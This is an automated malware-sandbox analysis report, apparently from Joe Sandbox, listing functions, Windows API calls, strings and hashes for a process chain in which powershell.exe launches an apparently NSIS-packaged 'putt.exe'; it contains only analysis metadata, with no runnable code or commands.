API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: e981e9375f5199886df9adb2645ac098046de6b51e66eaec7fe24d2fd6eccca5
Instruction ID: c857f15b5e371e7e4fcca01b65cf30786c6e3e0b02f48c0a2d8cadbd6cac3a53
Opcode Fuzzy Hash: e981e9375f5199886df9adb2645ac098046de6b51e66eaec7fe24d2fd6eccca5
Instruction Fuzzy Hash: 7711E932618B4182EB618F15E54026DB7F5FB88BD4F685235EB8D4B768EF3CD5618B00

Function 00007FF6D9BF7E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D9BF7EA8
LocalFree.KERNEL32 ref: 00007FF6D9BF7F14

Strings

Invalid SID, xrefs: 00007FF6D9BF7EF3

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: 4d0ccbe9cd87c67762e3f45dff726abbddade60e00e70dc2fdb163d8ac8d1d79
Instruction ID: 6e06490b4f3e8a90556dcdd4d578563215e2b8d297cd8b974eff56b40e97b0e2
Opcode Fuzzy Hash: 4d0ccbe9cd87c67762e3f45dff726abbddade60e00e70dc2fdb163d8ac8d1d79
Instruction Fuzzy Hash: D311917691978582EA148F11F44012EB3A0FB95BD4F415336EAAA47B98DF7DD1A0C740

Analysis Process: powershell.exePID: 7796, Parent PID: 7736COMMON

Executed Functions

Function 00007FFAAB3BB1F5 Relevance: 1.2, Instructions: 1226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1716666096.00007FFAAB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4179db79a5757a8f21ff9a154fa11bcc295c52ce5c71a90c2293d47ec827160e
Instruction ID: 968b2db919e770da09579dd6a1eb6e0598931bfe41f194c42a70bff5f5a39c70
Opcode Fuzzy Hash: 4179db79a5757a8f21ff9a154fa11bcc295c52ce5c71a90c2293d47ec827160e
Instruction Fuzzy Hash: 4F8238A290EFC58FE7A99B2888516787BD1EF56250F0840FED08DC75E7ED196C0983D2

Function 00007FFAAB590132 Relevance: .7, Instructions: 747COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1720498800.00007FFAAB590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab590000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14a0fb62dbe963c50d6ff0292e0fa8fca007737ff30fbf98e0261fddcaab2ea6
Instruction ID: dab0e4d567444ca942a014254fad8f40d6bfc95d437d620596dbc7f97c99e951
Opcode Fuzzy Hash: 14a0fb62dbe963c50d6ff0292e0fa8fca007737ff30fbf98e0261fddcaab2ea6
Instruction Fuzzy Hash: 4F32566290EB868FE7A59BA888515787BD5EF52340F0C48FED04EC71D3DD29AC0987C2

Function 00007FFAAB590250 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1720498800.00007FFAAB590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab590000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c10b28cbe848b1aa87371ac643d917898f618c3fac7a9e7537694e67d00f8e
Instruction ID: fe463057cd7e9f35124fba0faeb30ca27405ed7a7289db0d0d57915c64de6dd2
Opcode Fuzzy Hash: 95c10b28cbe848b1aa87371ac643d917898f618c3fac7a9e7537694e67d00f8e
Instruction Fuzzy Hash: F61246A290EB868FE7A59BA888515787BD5EF52340F0C44FED04EC71D3DD29AC0987C2

Function 00007FFAAB590CDE Relevance: .5, Instructions: 493COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1720498800.00007FFAAB590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab590000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b896d34eae1a5ef52bfe39f49f1c3da516dd990b4ce6028557eed29c4ef6ef52
Instruction ID: 95d567c35e9ca2078ee5670ef7bf3f864b74bb7c3a0ea98de70c90b7d231ff84
Opcode Fuzzy Hash: b896d34eae1a5ef52bfe39f49f1c3da516dd990b4ce6028557eed29c4ef6ef52
Instruction Fuzzy Hash: 50F14772D0EB869FE795DB6888516787BD1EF56340F0844BED04EC7193DE2AAC4983C2

Function 00007FFAAB590D02 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1720498800.00007FFAAB590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab590000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c329dd190e23a7203814f3ba44d0366976b0256a16e32ed34323cc7984cf35fe
Instruction ID: dacde5532f2aa11a0581898cbeb7592a459619389133cec2f231630960c8e677
Opcode Fuzzy Hash: c329dd190e23a7203814f3ba44d0366976b0256a16e32ed34323cc7984cf35fe
Instruction Fuzzy Hash: 32E14762D0EB869FE795DB6888516687BE5EF56340F0844BED04DC71D3CE2AAC498382

Function 00007FFAAB3B67B5 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1716666096.00007FFAAB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c4b185a9e74f81b2beb184469d8cbcce938d740160cb16ce70aacf9650a54f
Instruction ID: 7cf505530874e04fd7588126029058aef700fd76ec449229810e7e029395cd27
Opcode Fuzzy Hash: 98c4b185a9e74f81b2beb184469d8cbcce938d740160cb16ce70aacf9650a54f
Instruction Fuzzy Hash: 11C16DB290EF898FEB55AB6888155B9BBE1EF46350B0841FED04DC74E7DD18AC09C391

Function 00007FFAAB2EA4F2 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8127e3fd8d49cbfefe2a33a5b2de9bf5c58f0358da70d973ba56b18be3aa6d58
Instruction ID: bda8c22fddbb9ac9368d1b77ed55a44d9e98bcdf4c68f177b6c1a954770dc726
Opcode Fuzzy Hash: 8127e3fd8d49cbfefe2a33a5b2de9bf5c58f0358da70d973ba56b18be3aa6d58
Instruction Fuzzy Hash: 5E417E52A0EBD24FD312AB7CE8A50D97FB4EF5325570C40F7D189CA0A3D919184E8792

Function 00007FFAAB2EA1F8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d75eccf380c5a148549b37856b5dd7c093d034c2be2d55a832ed6b8ccf082edf
Instruction ID: 91b5fba2526f44b648f38711f4289bfcd687a54a427c257b3dde4069484240fb
Opcode Fuzzy Hash: d75eccf380c5a148549b37856b5dd7c093d034c2be2d55a832ed6b8ccf082edf
Instruction Fuzzy Hash: 31F08C71819A8C8FDB55DF2888695A87FE0FF6A341F0081ABE40DC7166DB25995CCBC2

Function 00007FFAAB3BB480 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1716666096.00007FFAAB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47bfdec62cd5f84db60c0dc558a744aef1b964fd23e0f968946451a7a5ab4cfb
Instruction ID: b96e0885477a2281cec4aca4fb946945b789c4b636b7b20d8afbbc53556d2745
Opcode Fuzzy Hash: 47bfdec62cd5f84db60c0dc558a744aef1b964fd23e0f968946451a7a5ab4cfb
Instruction Fuzzy Hash: 3651066291FF859FF6A9972888516786AD1EF53390F0840BED08DC75D7EC196C0D83A2

Function 00007FFAAB2E9BF8 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e65cb6a3d122013cabe72f6e6dbce68f65782c4882e81556759aebe7bac47a
Instruction ID: 2b1eaeb686704144227fccae72956aedf822959c9ce2032f4f3bdded1b4a2501
Opcode Fuzzy Hash: 23e65cb6a3d122013cabe72f6e6dbce68f65782c4882e81556759aebe7bac47a
Instruction Fuzzy Hash: BB410B7190DF888FD718DB5C98066B9BFE1FB59310F04816FE08D93192DA70A949CBC2

Function 00007FFAAB1CE610 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1707079669.00007FFAAB1CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab1cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4620865bd6e025aa3c74280b52a03c7d13f4f312d04d1b9a390c37291238d6e3
Instruction ID: 7ed53aa95ba355e4329813751c99c3b4bc313cec3a72ae957caf8c947978363b
Opcode Fuzzy Hash: 4620865bd6e025aa3c74280b52a03c7d13f4f312d04d1b9a390c37291238d6e3
Instruction Fuzzy Hash: 9041F27280EBC48FE7579B28D8459523FB0EF53364F1545EFD088CB1A3D624A84AC792

Function 00007FFAAB2EA831 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 619dc94a0b4dd8c12e45be30bb3ba6faacc5db6a47181f76012421679b5802eb
Instruction ID: 521ec418261e94a258017d2ae62bdee58f34cd763be054c633644eda4ef1e038
Opcode Fuzzy Hash: 619dc94a0b4dd8c12e45be30bb3ba6faacc5db6a47181f76012421679b5802eb
Instruction Fuzzy Hash: DE31C47190D7888FDB59DB68C84A6E97FF0EB56321F0541ABD048C7162D624980ACB52

Function 00007FFAAB2EC6D1 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d747ab2d7ced645fef3aa51cc776362ee8170affb9096d657e431d0eef0076
Instruction ID: a4bda8aafda4d9f057b77fe921d4d3400e40076dabf92011dee94083932fb281
Opcode Fuzzy Hash: e6d747ab2d7ced645fef3aa51cc776362ee8170affb9096d657e431d0eef0076
Instruction Fuzzy Hash: 1E211931A1890D8FDF94EB58C445EE97BA1EFA9340F144166D40ED7296CB24E886CBC1

Function 00007FFAAB1CE680 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1707079669.00007FFAAB1CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB1CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab1cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22375fc52658b59c72944c4b708bc81a85f1dad5c9c8def7d1460caee913926f
Instruction ID: f1a1bd7d9c5f06ee1a2872b654bed7871ede57af7557c358ab5d2e3c7a1654d6
Opcode Fuzzy Hash: 22375fc52658b59c72944c4b708bc81a85f1dad5c9c8def7d1460caee913926f
Instruction Fuzzy Hash: 98116D70419F089FAB99EB1DC889D233BE4FB99354B10465EE44CC7266D630FC81CB91

Function 00007FFAAB2E3AC5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: b1c55961d9c81558965bc48c2b54ea5470fd38b6c46e40fe7e085d562c0c4ffe
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 9A01677111CB0C8FD744EF0CE451AA5B7E0FB99364F50056EE58AC3665DB36E882CB46

Function 00007FFAAB3B42FD Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1716666096.00007FFAAB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376a0cb40792c1f041a6b341a75c757142da120499472b1c5b11ce5cf7739d8b
Instruction ID: d6b1c7f7e38ae0220a4b4d124135f23c796c25e76dd133dbc3998e0da9affa18
Opcode Fuzzy Hash: 376a0cb40792c1f041a6b341a75c757142da120499472b1c5b11ce5cf7739d8b
Instruction Fuzzy Hash: B2F0BE33A0DA45CFDB68EB1CE8418A873E0EF4632071A00BAE08DC7977DA25EC54C794

Function 00007FFAAB3B45B0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1716666096.00007FFAAB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB3B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab3b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa3a3f25e65b9b0e0be57210b3f0881f9d4592d1108b764abeb12adf5296107
Instruction ID: b050e1a1c858c96dc2cca3d68ffeb5ff94ebdcc136881030e94a76f03f1f882e
Opcode Fuzzy Hash: 4fa3a3f25e65b9b0e0be57210b3f0881f9d4592d1108b764abeb12adf5296107
Instruction Fuzzy Hash: 43F05E32A0D949DFDB54EB5CE4418A877E0FF0632071600F7E14DC7867CA25AC44C794

Non-executed Functions

Function 00007FFAAB2E044D Relevance: 7.6, Strings: 6, Instructions: 92COMMON

Download Yara Rule

Strings

8,:, xrefs: 00007FFAAB2E04B1
/:, xrefs: 00007FFAAB2E0469
p0:, xrefs: 00007FFAAB2E0491
(0:, xrefs: 00007FFAAB2E04D1
-:, xrefs: 00007FFAAB2E04F1
P/:, xrefs: 00007FFAAB2E04A1

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID: (0:$8,:$P/:$p0:$-:$/:
API String ID: 0-4258681767
Opcode ID: ef04cf81b8d052182802f3916ef807a818af8c41d9464360c2ef8f84e7ee51dd
Instruction ID: 1b6df80ca848f9e6403e1d724951df55e298175c7db4be1823ef986d70d48fcf
Opcode Fuzzy Hash: ef04cf81b8d052182802f3916ef807a818af8c41d9464360c2ef8f84e7ee51dd
Instruction Fuzzy Hash: CA31618790F7C14FE31687A91D261BA6F69EF6329071880FBD0CC8A5EF95149D4E83E1

Function 00007FFAAB2E89C3 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFAAB2E8A12
N_^, xrefs: 00007FFAAB2E8AC9
N_^, xrefs: 00007FFAAB2E8A22
N_^, xrefs: 00007FFAAB2E8A62

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: d4a211992dbea57bcf9e6af33992a9fc2e0d68c767fc48afd9fd647d8ca0a39b
Instruction ID: d767877dc98a8cb396cfc79e2ed9c806d56eb9e90c26904afa6ce510f7768190
Opcode Fuzzy Hash: d4a211992dbea57bcf9e6af33992a9fc2e0d68c767fc48afd9fd647d8ca0a39b
Instruction Fuzzy Hash: ED417493E0ABC29BF356436D98760E56F98EF5729470D42F7C1C84E5A7EE14180E42D3

Function 00007FFAAB2E0A08 Relevance: 5.1, Strings: 4, Instructions: 116COMMON

Download Yara Rule

Strings

HAN, xrefs: 00007FFAAB2E0AA9
I, xrefs: 00007FFAAB2E0A25
xFN, xrefs: 00007FFAAB2E0A79
PS^, xrefs: 00007FFAAB2E0AD4

Memory Dump Source

Source File: 00000011.00000002.1714408439.00007FFAAB2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffaab2e0000_powershell.jbxd

Similarity

API ID:
String ID: HAN$I$PS^$xFN
API String ID: 0-3726736609
Opcode ID: 1243183a6e9c277fc608db4c942eeff6f4d4e159ab4618567c1baf60517381e4
Instruction ID: 4fb85c5b5c49e9ff2fd353a2aaccb95c9e53bbfcfd3d3f311e4f8965b16fb41d
Opcode Fuzzy Hash: 1243183a6e9c277fc608db4c942eeff6f4d4e159ab4618567c1baf60517381e4
Instruction Fuzzy Hash: 8E41D78394FAC69FE34647A90C171E66F95FFA328075C80BBD19C461EBDA449D0E83C5

Analysis Process: putt.exePID: 3284, Parent PID: 7796COMMON

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.4%
Total number of Nodes:	1482
Total number of Limit Nodes:	27

Executed Functions

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

RichEd20, xrefs: 00405BC9
"F, xrefs: 00405A4B
_Nb, xrefs: 00405AFD
.exe, xrefs: 00405A69
@jG, xrefs: 00405AF2
RichEd32, xrefs: 00405BD4
.DEFAULT\Control Panel\International, xrefs: 004059C5
F, xrefs: 00405A22
RichEdit20A, xrefs: 00405BE2, 00405BE7
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
RichEdit, xrefs: 00405BF0

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00425576,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

vUB, xrefs: 0040346F, 0040348A, 00403513
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657296314.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_putt.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$vUB
API String ID: 651206458-1566941925
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
open, xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000016.00000002.1657146050.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.1657124376.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657166694.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000016.00000002.1657187862.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
